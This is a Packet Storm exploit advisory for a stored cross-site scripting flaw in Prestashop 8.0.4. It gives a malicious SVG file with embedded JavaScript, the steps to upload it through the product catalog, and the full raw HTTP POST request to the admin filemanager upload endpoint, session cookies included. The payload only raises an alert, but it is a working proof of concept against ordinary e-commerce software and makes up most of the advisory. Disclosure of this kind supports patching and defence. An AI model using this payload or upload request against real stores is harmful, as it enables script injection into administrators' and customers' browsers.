what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Prestashop 8.0.4 Cross Site Scripting

Prestashop 8.0.4 Cross Site Scripting
Posted Jul 3, 2023
Authored by Mirabbas Agalarov

Prestashop version 8.0.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | cf164e7cc87619a9dbef11f57805a9c16b7102dbec40db184a728b0bac5d40e9
Download | Favorite | View

Prestashop 8.0.4 Cross Site Scripting

Change Mirror Download
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
steps: 

1. Go to Catalog => Products 
2. Select arbitary product 
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>


poc request:

POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua: 
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
Connection: close

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close